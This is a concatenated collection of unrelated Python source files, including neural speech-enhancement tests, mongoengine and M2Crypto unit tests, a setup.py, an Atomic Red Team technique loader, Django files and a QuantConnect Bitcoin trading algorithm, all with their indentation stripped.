with_ipd_transform = EnhTransform(feats="spectrogram-log-cmvn-ipd",
frame_len=512,
frame_hop=256,
center=True,
ipd_index="0,1;0,2;0,3")
none_transform = EnhTransform(feats="",
frame_len=512,
frame_hop=256,
center=True)
@pytest.mark.parametrize("num_spks,non_linear", [
pytest.param(1, "sigmoid"),
pytest.param(2, "softmax"),
pytest.param(3, "relu")
])
def test_base_rnn(num_spks, non_linear):
nnet_cls = aps_sse_nnet("sse@base_rnn")
base_rnn = nnet_cls(enh_transform=log_cmvn_transform,
num_bins=num_bins,
input_size=num_bins,
input_proj=512,
num_layers=2,
hidden=512,
num_spks=num_spks,
mask_non_linear=non_linear)
inp = th.rand(2, 64000)
x = base_rnn(inp)
if num_spks > 1:
x = x[0]
assert x.shape == th.Size([2, num_bins, 251])
z = base_rnn.infer(inp[0])
if num_spks > 1:
z = z[0]
assert z.shape == th.Size([64000])
@pytest.mark.parametrize("non_linear", ["softmax", "relu"])
def test_chimera(non_linear):
nnet_cls = aps_sse_nnet("sse@chimera++")
chimera = nnet_cls(enh_transform=log_cmvn_transform,
num_bins=num_bins,
input_size=num_bins,
num_layers=2,
hidden=512,
num_spks=2,
mask_non_linear=non_linear)
inp = th.rand(2, 64000)
x = chimera(inp)
assert x[0].shape == th.Size([2, num_bins, 251])
z = chimera.infer(inp[0])
assert z[0].shape == th.Size([64000])
def test_phasen():
nnet_cls = aps_sse_nnet("sse@phasen")
phasen = nnet_cls(12,
4,
enh_transform=none_transform,
num_tsbs=1,
num_bins=num_bins,
channel_r=5,
conv1d_kernel=9,
lstm_hidden=256,
linear_size=512)
inp = th.rand(4, 64000)
x = phasen(inp)
assert x.shape == th.Size([4, num_bins, 251, 2])
z = phasen.infer(inp[1])
assert z.shape == th.Size([64000])
@pytest.mark.parametrize("num_branch", [1, 2])
@pytest.mark.parametrize("cplx", [True, False])
def test_dcunet(num_branch, cplx):
nnet_cls = aps_sse_nnet("sse@dcunet")
dcunet = nnet_cls(enh_transform=none_transform,
K="7,5;7,5;5,3;5,3;3,3;3,3",
S="2,1;2,1;2,1;2,1;2,1;2,1",
C="32,32,64,64,64,128",
P="1,1,1,1,1,0",
O="0,0,1,1,1,0",
num_branch=num_branch,
cplx=cplx,
non_linear="tanh" if cplx else "sigmoid",
causal_conv=False,
connection="cat")
inp = th.rand(4, 64000)
x = dcunet(inp)
if num_branch > 1:
x = x[0]
assert x.shape == th.Size([4, 64000])
y = dcunet.infer(inp[1])
if num_branch > 1:
y = y[0]
assert y.shape == th.Size([64000])
@pytest.mark.parametrize("num_spks", [1, 2])
@pytest.mark.parametrize("non_linear", ["", "sigmoid"])
def test_dense_unet(num_spks, non_linear):
nnet_cls = aps_sse_nnet("sse@dense_unet")
dense_unet = nnet_cls(K="3,3;3,3;3,3;3,3;3,3;3,3;3,3;3,3",
S="1,1;2,1;2,1;2,1;2,1;2,1;2,1;2,1",
P="0,1;0,1;0,1;0,1;0,1;0,1;0,1;0,1;0,1",
O="0,0,0,0,0,0,0,0",
enc_channel="16,32,32,32,32,64,128,384",
dec_channel="32,16,32,32,32,32,64,128",
conv_dropout=0.3,
num_spks=num_spks,
rnn_hidden=512,
rnn_layers=2,
rnn_resize=384,
rnn_bidir=False,
rnn_dropout=0.2,
num_dense_blocks=3,
enh_transform=log_cmvn_transform,
non_linear=non_linear,
inp_cplx=True,
out_cplx=True,
training_mode="time")
inp = th.rand(4, 64000)
x = dense_unet(inp)
if num_spks > 1:
x = x[0]
assert x.shape == th.Size([4, 64000])
y = dense_unet.infer(inp[1])
if num_spks > 1:
y = y[0]
assert y.shape == th.Size([64000])
@pytest.mark.parametrize("num_spks", [1, 2])
def test_freq_xfmr(num_spks):
nnet_cls = aps_sse_nnet("sse@freq_xfmr")
pose_kwargs = {"lradius": 256, "rradius": 256, "dropout": 0.1}
arch_kwargs = {
"att_dropout": 0.1,
"feedforward_dim": 512,
"pre_norm": False,
"att_dim": 256,
"nhead": 4
}
xfmr = nnet_cls(arch="xfmr",
input_size=num_bins,
enh_transform=log_cmvn_transform,
num_spks=num_spks,
num_bins=num_bins,
arch_kwargs=arch_kwargs,
pose_kwargs=pose_kwargs,
num_layers=3,
non_linear="sigmoid",
training_mode="time")
inp = th.rand(4, 64000)
x = xfmr(inp)
if num_spks > 1:
assert len(x) == num_spks
assert x[0].shape == th.Size([4, 64000])
else:
assert x.shape == th.Size([4, 64000])
y = xfmr.infer(inp[1])
if num_spks > 1:
y = y[0]
assert y.shape == th.Size([64000])
@pytest.mark.parametrize("num_spks,nonlinear", [
pytest.param(1, "sigmoid"),
pytest.param(2, "softmax"),
pytest.param(2, "relu")
])
def test_tasnet(num_spks, nonlinear):
nnet_cls = aps_sse_nnet("sse@time_tcn")
tasnet = nnet_cls(L=40,
N=256,
X=6,
R=2,
B=256,
H=512,
P=3,
norm="cLN",
num_spks=num_spks,
non_linear=nonlinear,
skip_residual=True,
causal=False,
mixture_consistency="none")
inp = th.rand(4, 64000)
x = tasnet(inp)
if num_spks > 1:
x = x[0]
assert x.shape == th.Size([4, 64000])
y = tasnet.infer(inp[1])
if num_spks > 1:
y = y[0]
assert y.shape == th.Size([64000])
@pytest.mark.parametrize("num_spks", [1, 2])
@pytest.mark.parametrize("cplx", [True, False])
def test_dccrn(num_spks, cplx):
nnet_cls = aps_sse_nnet("sse@dccrn")
dccrn = nnet_cls(enh_transform=log_cmvn_transform,
cplx=cplx,
K="3,3;3,3;3,3;3,3;3,3;3,3;3,3",
S="2,1;2,1;2,1;2,1;2,1;2,1;2,1",
P="1,1,1,1,1,0,0",
O="0,0,0,0,0,0,1",
C="16,32,64,64,128,128,256",
num_spks=num_spks,
rnn_resize=512 if cplx else 256,
non_linear="sigmoid",
connection="cat")
inp = th.rand(4, 64000)
x = dccrn(inp)
if num_spks > 1:
x = x[0]
assert x.shape == th.Size([4, 64000])
y = dccrn.infer(inp[1])
if num_spks > 1:
y = y[0]
assert y.shape == th.Size([64000])
def test_rnn_enh_ml():
nnet_cls = aps_sse_nnet("sse@rnn_enh_ml")
rnn_enh_ml = nnet_cls(enh_transform=with_ipd_transform,
num_bins=num_bins,
input_size=num_bins * 4,
input_proj=512,
num_layers=2,
hidden=512)
inp = th.rand(2, 5, 64000)
x, y = rnn_enh_ml(inp)
assert x.shape == th.Size([2, 5, num_bins, 251])
assert th.isnan(x.real).sum() + th.isnan(x.imag).sum() == 0
assert y.shape == th.Size([2, 251, num_bins])
z = rnn_enh_ml.infer(inp[0])
assert z.shape == th.Size([251, num_bins])
@pytest.mark.parametrize("resampling_factor", [1, 2, 4])
@pytest.mark.parametrize("chunk_len", [16000, 32000])
def test_demucs(resampling_factor, chunk_len):
nnet_cls = aps_sse_nnet("sse@demucs")
from aps.sse.enh.demucs import workout_train_chunk_length
chunk_len_for_train = workout_train_chunk_length(
chunk_len, resampling_factor=resampling_factor)
demucs = nnet_cls(resampling_factor=resampling_factor)
x = th.rand(2, chunk_len_for_train)
y = demucs(x)
assert y.shape == th.Size([2, chunk_len_for_train])
x = th.rand(chunk_len)
y = demucs.infer(x)
assert y.shape == th.Size([chunk_len])
@pytest.mark.parametrize("num_spks", [1, 2])
def test_dfsmn(num_spks):
nnet_cls = aps_sse_nnet("sse@dfsmn")
dfsmn = nnet_cls(enh_transform=log_cmvn_transform,
num_layers=3,
dim=512,
num_branchs=num_spks,
project=256,
lctx=11,
rctx=5,
training_mode="time")
inp = th.rand(4, 64000)
x = dfsmn(inp)
if num_spks > 1:
x = x[0]
assert x.shape == th.Size([4, 64000])
y = dfsmn.infer(inp[1])
if num_spks > 1:
y = y[0]
assert y.shape == th.Size([64000])
def test_dprnn():
nnet_cls = aps_sse_nnet("sse@time_dprnn")
dprnn = nnet_cls(num_spks=1,
kernel=16,
num_bins=64,
chunk_size=100,
num_layers=2,
rnn_hidden=64,
bidirectional=True,
non_linear="relu")
inp = th.rand(4, 64000)
x = dprnn(inp)
assert x.shape == th.Size([4, 64000])
y = dprnn.infer(inp[1])
assert y.shape == th.Size([64000])
def test_sepformer():
nnet_cls = aps_sse_nnet("sse@freq_sepformer")
arch_kwargs = {
"att_dim": 256,
"nhead": 4,
"feedforward_dim": 1024,
"pre_norm": True,
"att_dropout": 0.1,
"ffn_dropout": 0.1,
"activation": "relu"
}
sepformer = nnet_cls("xfmr",
enh_transform=log_cmvn_transform,
num_bins=num_bins,
num_spks=1,
num_blocks=2,
num_layers=2,
chunk_size=16,
arch_kwargs=arch_kwargs,
training_mode="time")
mix = th.rand(2, 32000)
bss = sepformer(mix)
assert bss.shape == th.Size([2, 32000])
bss = sepformer.infer(mix[1])
assert bss.shape == th.Size([32000])
|
py | 7dfcffc357177139a3cbddcf4799e66c23ce698e | # 043 - Write a Python program to get OS name, platform and release information.
from platform import release, system
from os import name
print(f'Name: {name}\nPlatform: {release()}\nRelease: {system()}') |
py | 7dfcffefa580f7c02e9ce710f581b4a713b08092 | from enum import Enum
import pytest
from bson import InvalidDocument
from mongoengine import Document, EnumField, ValidationError
from tests.utils import MongoDBTestCase, get_as_pymongo
class Status(Enum):
NEW = "new"
DONE = "done"
class ModelWithEnum(Document):
status = EnumField(Status)
class TestStringEnumField(MongoDBTestCase):
def test_storage(self):
model = ModelWithEnum(status=Status.NEW).save()
assert get_as_pymongo(model) == {"_id": model.id, "status": "new"}
def test_set_enum(self):
ModelWithEnum.drop_collection()
ModelWithEnum(status=Status.NEW).save()
assert ModelWithEnum.objects(status=Status.NEW).count() == 1
assert ModelWithEnum.objects.first().status == Status.NEW
def test_set_by_value(self):
ModelWithEnum.drop_collection()
ModelWithEnum(status="new").save()
assert ModelWithEnum.objects.first().status == Status.NEW
def test_filter(self):
ModelWithEnum.drop_collection()
ModelWithEnum(status="new").save()
assert ModelWithEnum.objects(status="new").count() == 1
assert ModelWithEnum.objects(status=Status.NEW).count() == 1
assert ModelWithEnum.objects(status=Status.DONE).count() == 0
def test_change_value(self):
m = ModelWithEnum(status="new")
m.status = Status.DONE
m.save()
assert m.status == Status.DONE
m.status = "wrong"
assert m.status == "wrong"
with pytest.raises(ValidationError):
m.validate()
def test_set_default(self):
class ModelWithDefault(Document):
status = EnumField(Status, default=Status.DONE)
m = ModelWithDefault().save()
assert m.status == Status.DONE
def test_enum_field_can_be_empty(self):
ModelWithEnum.drop_collection()
m = ModelWithEnum().save()
assert m.status is None
assert ModelWithEnum.objects()[0].status is None
assert ModelWithEnum.objects(status=None).count() == 1
def test_set_none_explicitly(self):
ModelWithEnum.drop_collection()
ModelWithEnum(status=None).save()
assert ModelWithEnum.objects.first().status is None
def test_cannot_create_model_with_wrong_enum_value(self):
m = ModelWithEnum(status="wrong_one")
with pytest.raises(ValidationError):
m.validate()
def test_user_is_informed_when_tries_to_set_choices(self):
with pytest.raises(ValueError, match="'choices' can't be set on EnumField"):
EnumField(Status, choices=["my", "custom", "options"])
class Color(Enum):
RED = 1
BLUE = 2
class ModelWithColor(Document):
color = EnumField(Color, default=Color.RED)
class TestIntEnumField(MongoDBTestCase):
def test_enum_with_int(self):
ModelWithColor.drop_collection()
m = ModelWithColor().save()
assert m.color == Color.RED
assert ModelWithColor.objects(color=Color.RED).count() == 1
assert ModelWithColor.objects(color=1).count() == 1
assert ModelWithColor.objects(color=2).count() == 0
def test_create_int_enum_by_value(self):
model = ModelWithColor(color=2).save()
assert model.color == Color.BLUE
def test_storage_enum_with_int(self):
model = ModelWithColor(color=Color.BLUE).save()
assert get_as_pymongo(model) == {"_id": model.id, "color": 2}
def test_validate_model(self):
with pytest.raises(ValidationError, match="Value must be one of"):
ModelWithColor(color=3).validate()
with pytest.raises(ValidationError, match="Value must be one of"):
ModelWithColor(color="wrong_type").validate()
class TestFunkyEnumField(MongoDBTestCase):
def test_enum_incompatible_bson_type_fails_during_save(self):
class FunkyColor(Enum):
YELLOW = object()
class ModelWithFunkyColor(Document):
color = EnumField(FunkyColor)
m = ModelWithFunkyColor(color=FunkyColor.YELLOW)
with pytest.raises(InvalidDocument, match="[cC]annot encode object"):
m.save()
|
py | 7dfd029798ead2ca7b72aa0fd7e7872a5e275338 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# read version string
with open(path.join(here, "video_fft", "__init__.py")) as version_file:
version = eval(version_file.read().split(" = ")[1].strip())
# Get the long description from the README file
with open(path.join(here, "README.md"), encoding="utf-8") as f:
long_description = f.read()
# Get the history from the CHANGELOG file
with open(path.join(here, "CHANGELOG.md"), encoding="utf-8") as f:
history = f.read()
setup(
name="video_fft",
version=version,
description="Calculate the magnitude spectrum of a video sequence, via Fast Fourier Transform",
long_description=long_description + "\n\n" + history,
long_description_content_type="text/markdown",
author="Werner Robitza",
author_email="[email protected]",
url="https://github.com/slhck/video-fft",
packages=["video_fft"],
include_package_data=True,
install_requires=[
"av>=8.0.3",
"tqdm>=4.60.0",
"numpy>=1.20.2",
"matplotlib>=3.4.2",
],
license="MIT",
zip_safe=False,
keywords="ffmpeg, video",
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Topic :: Multimedia :: Video",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
python_requires=">=3.6",
entry_points={"console_scripts": ["video-fft = video_fft.__main__:main"]},
)
|
py | 7dfd029b4918d4dbc03e1e04254750f965a220d8 | #!/usr/bin/env python
import configparser
from asnake.aspace import ASpace
config = configparser.ConfigParser()
config.read("local_settings.cfg")
aspace = ASpace(
baseurl=config.get("ArchivesSpace", "baseURL"),
username=config.get("ArchivesSpace", "user"),
password=config.get("ArchivesSpace", "password"),
)
repo = aspace.repositories(2)
output_file = "output_filename.tsv"
resource_id = 12345
def is_year(date, x, y):
'''
date (str): string to check for a 4 digit year
x (int): starting index value
y (int): ending index value
'''
if date[x:y].isdigit() and int(
date[x:y]) >= 1800 and int(date[x:y]) <= 2010:
return True
else:
return False
def find_year(date):
'''takes a string, and finds a 4 digit string matching years likely in our
collections, working backwards from end of string; checks last four
characters before looping'''
if len(date) >= 4:
if is_year(date, -4, None):
return date[-4:]
else:
x = -5
y = -1
for r in range(len(date)):
if is_year(date, x, y):
return date[x:y]
break
else:
x += -1
y += -1
def get_end_date(ao, default_date):
# uses either structured date or date expression to get end year
if ao.get("dates"):
# check for structured date field, return date as YYYY-YYYY
if ao.get("dates")[0].get("begin"):
return find_year(
ao.get("dates")[0].get(
"end", ao.get("dates")[0].get(
"begin", "")))
else:
if len(ao.get("dates")[0].get("expression")) == 4:
return ao.get("dates")[0].get("expression")
else:
return find_year(ao.get("dates")[0].get("expression"))
else:
return default_date
# create empty list to append uris to
list_of_uris = []
for record in repo.resources(resource_id).tree.walk:
# traverse tree of resource record, use level to skip series
if record.level == "file":
list_of_uris.append(record.uri)
f = open(output_file, "a")
for uri in list_of_uris:
obj = aspace.client.get(uri, params={"resolve": ["top_container"]})
item_json = obj.json()
if item_json.get("instances"):
for i in item_json.get("instances"):
if i.get("instance_type") != "digital_object":
subcontainer = i.get('sub_container')
if subcontainer.get("type_2") == "folder":
folder_number = "{} {}".format(subcontainer.get(
'type_2'), subcontainer.get('indicator_2'))
top_container = subcontainer.get(
"top_container").get("_resolved")
if top_container.get("type") == "box":
f.write(
"{}\t{} {}, {}\t{}\t{}\n".format(
item_json.get("title"),
top_container.get("type").capitalize(),
top_container.get("indicator"),
folder_number,
get_end_date(item_json, "1940"),
item_json.get("ref_id")))
f.close()
|
py | 7dfd04404796e1fd5ae7584c63884183e8de6679 | #!/usr/bin/env python
"""Unit tests for M2Crypto.EC, ECDSA part.
Copyright (c) 2000 Ng Pheng Siong. All rights reserved.
Portions copyright (c) 2005-2006 Vrije Universiteit Amsterdam. All
rights reserved.
"""
import hashlib
import logging
from M2Crypto import EC, Rand
from . import unittest
from tests.test_ec_curves import tested_curve
log = logging.getLogger(__name__)
class ECDSATestCase(unittest.TestCase):
errkey = 'tests/rsa.priv.pem'
privkey = 'tests/ec.priv.pem'
pubkey = 'tests/ec.pub.pem'
data = hashlib.sha1(b'Can you spell subliminal channel?').digest()
def callback(self, *args):
pass
def callback2(self):
pass
def test_loadkey_junk(self):
with self.assertRaises(ValueError):
EC.load_key(self.errkey)
def test_loadkey(self):
ec = EC.load_key(self.privkey)
self.assertEqual(len(ec), tested_curve[1])
def test_loadpubkey(self):
# XXX more work needed
ec = EC.load_pub_key(self.pubkey)
self.assertEqual(len(ec), tested_curve[1])
with self.assertRaises(EC.ECError):
EC.load_pub_key(self.errkey)
def _test_sign_dsa(self):
ec = EC.gen_params(tested_curve[0])
# ec.gen_key()
with self.assertRaises(EC.ECError):
ec.sign_dsa(self.data)
ec = EC.load_key(self.privkey)
r, s = ec.sign_dsa(self.data)
assert ec.verify_dsa(self.data, r, s)
assert not ec.verify_dsa(self.data, s, r)
def test_sign_dsa_asn1(self):
ec = EC.load_key(self.privkey)
blob = ec.sign_dsa_asn1(self.data)
assert ec.verify_dsa_asn1(self.data, blob)
with self.assertRaises(EC.ECError):
ec.verify_dsa_asn1(blob, self.data)
def test_verify_dsa(self):
ec = EC.load_key(self.privkey)
r, s = ec.sign_dsa(self.data)
ec2 = EC.load_pub_key(self.pubkey)
assert ec2.verify_dsa(self.data, r, s)
assert not ec2.verify_dsa(self.data, s, r)
def test_genparam(self):
ec = EC.gen_params(tested_curve[0])
self.assertEqual(len(ec), tested_curve[1])
def test_pub_key_from_params(self):
curve = EC.NID_prime256v1
ec = EC.gen_params(curve)
ec.gen_key()
ec_pub = ec.pub()
k = ec_pub.get_key()
ec2 = EC.pub_key_from_params(curve, k)
assert ec2.check_key()
r, s = ec.sign_dsa(self.data)
assert ec2.verify_dsa(self.data, r, s)
def suite():
return unittest.TestLoader().loadTestsFromTestCase(ECDSATestCase)
if __name__ == '__main__':
Rand.load_file('randpool.dat', -1)
unittest.TextTestRunner().run(suite())
Rand.save_file('randpool.dat')
|
py | 7dfd04420e46026d3e837bedc87a3c6cebec92b2 | import os
from pathlib import Path, PurePath
import yaml
from ..base import Base
from .atomic import Atomic
from ..utils.exceptions import AtomicsFolderNotFound
class Loader(Base):
__techniques = {}
TECHNIQUE_DIRECTORY_PATTERN = 'T*'
def __get_file_name(self, path) -> str:
return path.name.rstrip('.yaml')
def find_atomics(self, atomics_path, pattern='**/T*/T*.yaml') -> list:
"""Attempts to find the atomics folder within the provided atomics_path
Args:
atomics_path (str): A path to the atomic-red-team directory
pattern (str, optional): Pattern used to find atomics and their required yaml files. Defaults to '**/T*/T*.yaml'.
Returns:
list: A list of paths of all identified atomics found in the given directory
"""
result = []
path = PurePath(atomics_path)
for p in Path(path).rglob(pattern):
result.append(p.resolve())
return result
def load_technique(self, path_to_dir) -> dict:
"""Loads a provided yaml file which is typically an Atomic defintiion or configuration file.
Args:
path_to_dir (str): A string path to a yaml formatted file
Returns:
dict: Returns the loaded yaml file in a dictionary format
"""
try:
with open(self.get_abs_path(path_to_dir), 'r', encoding="utf-8") as f:
return yaml.safe_load(f.read())
except:
# windows does not like get_abs_path so casting to string
with open(str(path_to_dir), 'r', encoding="utf-8") as f:
return yaml.safe_load(f.read())
def load_techniques(self) -> dict:
"""The main entrypoint when loading techniques from disk.
Raises:
AtomicsFolderNotFound: Thrown when unable to find the folder containing
Atomic tests
Returns:
dict: A dict with the key(s) as the Atomic technique ID and the val
is a list of Atomic objects.
"""
atomics_path = Base.CONFIG.atomics_path
if not os.path.exists(self.get_abs_path(atomics_path)):
atomics_path = self.find_atomics(self.get_abs_path(__file__))
if not atomics_path:
raise AtomicsFolderNotFound('Unable to find any atomics folder')
else:
atomics_path = self.find_atomics(atomics_path)
if not atomics_path:
raise AtomicsFolderNotFound('Unable to find any atomics folder')
for atomic_entry in atomics_path:
technique = self.__get_file_name(atomic_entry)
if not self.__techniques.get(technique):
loaded_technique = self.load_technique(str(atomic_entry))
loaded_technique.update({'path': os.path.dirname(str(atomic_entry))})
self.__techniques[technique] = Atomic(**loaded_technique)
return self.__techniques
|
py | 7dfd052e7fe549f9a1139a6b479563a5dee56ead | from django.contrib import admin
from .models import Table
class TableAdmin(admin.ModelAdmin):
list_display = ("name", "price", "url",)
admin.site.register(Table, TableAdmin) |
py | 7dfd05614ce9702feb349ad4f932b89790d7d03c | # Copyright (c) 2016-2021 The Regents of the University of Michigan
# Part of fresnel, released under the BSD 3-Clause License.
"""Test the Scene class."""
import fresnel
import numpy
from collections import namedtuple
import PIL
import conftest
import os
import pathlib
dir_path = pathlib.Path(os.path.realpath(__file__)).parent
def test_background_color(device_):
"""Test the background_color property."""
scene = fresnel.Scene(device=device_)
scene.background_color = fresnel.color.linear((0.125, 0.75, 0.375))
numpy.testing.assert_array_equal(scene.background_color,
fresnel.color.linear((0.125, 0.75, 0.375)))
scene.background_alpha = 0.5
assert scene.background_alpha == 0.5
scene.camera = fresnel.camera.Orthographic(position=(0, 0, 10),
look_at=(0, 0, 0),
up=(0, 1, 0),
height=7)
buf_proxy = fresnel.preview(scene, w=100, h=100, anti_alias=False)
buf = buf_proxy[:]
numpy.testing.assert_array_equal(
buf[:, :, 3],
numpy.ones(shape=(100, 100), dtype=buf.dtype) * 128)
numpy.testing.assert_array_equal(
buf[:, :, 0:3],
numpy.ones(shape=(100, 100, 3), dtype=buf.dtype) * (32, 191, 96))
def test_camera(scene_hex_sphere_, generate=False):
"""Test the camera property."""
scene_hex_sphere_.camera = fresnel.camera.Orthographic(position=(1, 0, 10),
look_at=(1, 0, 0),
up=(0, 1, 0),
height=6)
numpy.testing.assert_array_equal(scene_hex_sphere_.camera.position,
(1, 0, 10))
numpy.testing.assert_array_equal(scene_hex_sphere_.camera.look_at,
(1, 0, 0))
numpy.testing.assert_array_equal(scene_hex_sphere_.camera.up, (0, 1, 0))
assert scene_hex_sphere_.camera.height == 6
buf_proxy = fresnel.preview(scene_hex_sphere_,
w=100,
h=100,
anti_alias=False)
if generate:
PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save(
open('output/test_scene.test_camera.png', 'wb'), 'png')
else:
conftest.assert_image_approx_equal(
buf_proxy[:], dir_path / 'reference' / 'test_scene.test_camera.png')
def test_light_dir(scene_hex_sphere_, generate=False):
"""Test the lights property."""
scene_hex_sphere_.lights[0].direction = (1, 0, 0)
scene_hex_sphere_.lights[0].color = (0.5, 0.5, 0.5)
assert scene_hex_sphere_.lights[0].direction == (1, 0, 0)
assert scene_hex_sphere_.lights[0].color == (0.5, 0.5, 0.5)
buf_proxy = fresnel.preview(scene_hex_sphere_,
w=100,
h=100,
anti_alias=False)
if generate:
PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save(
open('output/test_scene.test_light_dir.png', 'wb'), 'png')
else:
conftest.assert_image_approx_equal(
buf_proxy[:],
dir_path / 'reference' / 'test_scene.test_light_dir.png')
def test_multiple_geometries(device_, generate=False):
"""Test multiple geometries."""
scene = fresnel.Scene(lights=conftest.test_lights())
scene.camera = fresnel.camera.Orthographic(position=(0, 0, 10),
look_at=(0, 0, 0),
up=(0, 1, 0),
height=7)
geom1 = fresnel.geometry.Sphere(scene,
position=[[-4, 1, 0], [-4, -1, 0],
[-2, 1, 0], [-2, -1, 0]],
radius=1.0)
geom1.material = fresnel.material.Material(solid=1.0,
color=fresnel.color.linear(
[0.42, 0.267, 1]))
geom1.outline_width = 0.12
geom2 = fresnel.geometry.Sphere(scene,
position=[[4, 1, 0], [4, -1, 0], [2, 1, 0],
[2, -1, 0]],
radius=1.0)
geom2.material = fresnel.material.Material(solid=0.0,
color=fresnel.color.linear(
[1, 0.874, 0.169]))
buf_proxy = fresnel.preview(scene, w=200, h=100, anti_alias=False)
if generate:
PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save(
open('output/test_scene.test_multiple_geometries1.png', 'wb'),
'png')
else:
conftest.assert_image_approx_equal(
buf_proxy[:],
dir_path / 'reference' / 'test_scene.test_multiple_geometries1.png')
geom1.disable()
buf_proxy = fresnel.preview(scene, w=200, h=100, anti_alias=False)
if generate:
PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save(
open('output/test_scene.test_multiple_geometries2.png', 'wb'),
'png')
else:
conftest.assert_image_approx_equal(
buf_proxy[:],
dir_path / 'reference' / 'test_scene.test_multiple_geometries2.png')
geom1.enable()
buf_proxy = fresnel.preview(scene, w=200, h=100, anti_alias=False)
if generate:
PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save(
open('output/test_scene.test_multiple_geometries3.png', 'wb'),
'png')
else:
conftest.assert_image_approx_equal(
buf_proxy[:],
dir_path / 'reference' / 'test_scene.test_multiple_geometries3.png')
geom2.remove()
buf_proxy = fresnel.preview(scene, w=200, h=100, anti_alias=False)
if generate:
PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save(
open('output/test_scene.test_multiple_geometries4.png', 'wb'),
'png')
else:
conftest.assert_image_approx_equal(
buf_proxy[:],
dir_path / 'reference' / 'test_scene.test_multiple_geometries4.png')
if __name__ == '__main__':
struct = namedtuple("struct", "param")
device = conftest.device(struct(('cpu', None)))
scene = conftest.scene_hex_sphere(device)
test_camera(scene, generate=True)
scene = conftest.scene_hex_sphere(device)
test_light_dir(scene, generate=True)
scene = conftest.scene_hex_sphere(device)
test_multiple_geometries(scene, generate=True)
|
py | 7dfd0607f253f5b65eaa88b5d2c0988711c23a0a | import urllib.request as ur
import urllib
"""
2017 - 4 - 10 neko34
从网络中获取对应的数据,调用对应的API
"""
def openUrl(urlString):
html = ur.urlopen(urlString).read()
return html
|
py | 7dfd06c6f7c0121185935619390d90deea4527f1 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.db import models, migrations
def create_profiles(apps, schema_editor):
"""
Make sure that any already-created users have profiles, as the profile
creation signal handler will never be triggered for already-existing users.
"""
User = apps.get_model(settings.AUTH_USER_MODEL)
UserProfile = apps.get_model('users', 'UserProfile')
for user in User.objects.all():
profile = UserProfile()
profile.user = user
profile.terms_of_use = False # Default value, but we're being explicit
profile.save()
class Migration(migrations.Migration):
dependencies = [
('users', '0009_userprofile'),
]
operations = [
migrations.RunPython(create_profiles)
]
|
py | 7dfd071e899187f1c780a867f77d355783f1ea78 | #!/usr/bin/env python
import src.network as network
from . import args
class NeuralNet:
def __init__(self):
self.args = args
def run(self):
network.startNetwork(self)
|
py | 7dfd07a9d0f7d7b0295b2177418e2123657298a5 | # QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.
# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from clr import AddReference
AddReference("System")
AddReference("QuantConnect.Algorithm")
AddReference("QuantConnect.Common")
from System import *
from QuantConnect import *
from QuantConnect.Algorithm import *
from QuantConnect.Data import SubscriptionDataSource
from QuantConnect.Python import PythonData
from datetime import date, timedelta, datetime
import decimal
import numpy as np
import json
class CustomDataBitcoinAlgorithm(QCAlgorithm):
'''3.0 CUSTOM DATA SOURCE: USE YOUR OWN MARKET DATA (OPTIONS, FOREX, FUTURES, DERIVATIVES etc).
The new QuantConnect Lean Backtesting Engine is incredibly flexible and allows you to define your own data source.
This includes any data source which has a TIME and VALUE. These are the *only* requirements.
To demonstrate this we're loading in "Bitcoin" data.'''
def Initialize(self):
self.SetStartDate(2011, 9, 13)
self.SetEndDate(datetime.now().date() - timedelta(1))
self.SetCash(100000)
# Define the symbol and "type" of our generic data:
self.AddData(Bitcoin, "BTC")
def OnData(self, data):
if "BTC" not in data: return
close = data["BTC"].Close
# If we don't have any weather "SHARES" -- invest"
if not self.Portfolio.Invested:
# Weather used as a tradable asset, like stocks, futures etc.
self.SetHoldings("BTC", 1)
self.Debug("Buying BTC 'Shares': BTC: {0}".format(close))
self.Debug("Time: {0} {1}".format(datetime.now(), close))
class Bitcoin(PythonData):
'''Custom Data Type: Bitcoin data from Quandl - http://www.quandl.com/help/api-for-bitcoin-data'''
def GetSource(self, config, date, isLiveMode):
if isLiveMode:
return SubscriptionDataSource("https://www.bitstamp.net/api/ticker/", SubscriptionTransportMedium.Rest);
#return "http://my-ftp-server.com/futures-data-" + date.ToString("Ymd") + ".zip";
# OR simply return a fixed small data file. Large files will slow down your backtest
return SubscriptionDataSource("http://www.quandl.com/api/v1/datasets/BCHARTS/BITSTAMPUSD.csv?sort_order=asc", SubscriptionTransportMedium.RemoteFile);
def Reader(self, config, line, date, isLiveMode):
coin = Bitcoin()
coin.Symbol = config.Symbol
if isLiveMode:
# Example Line Format:
# {"high": "441.00", "last": "421.86", "timestamp": "1411606877", "bid": "421.96", "vwap": "428.58", "volume": "14120.40683975", "low": "418.83", "ask": "421.99"}
try:
liveBTC = json.loads(line)
# If value is zero, return None
value = decimal.Decimal(liveBTC["last"])
if value == 0: return None
coin.Time = datetime.now()
coin.Value = value
coin["Open"] = float(liveBTC["open"])
coin["High"] = float(liveBTC["high"])
coin["Low"] = float(liveBTC["low"])
coin["Close"] = float(liveBTC["last"])
coin["Ask"] = float(liveBTC["ask"])
coin["Bid"] = float(liveBTC["bid"])
coin["VolumeBTC"] = float(liveBTC["volume"])
coin["WeightedPrice"] = float(liveBTC["vwap"])
return coin
except ValueError:
# Do nothing, possible error in json decoding
return None
# Example Line Format:
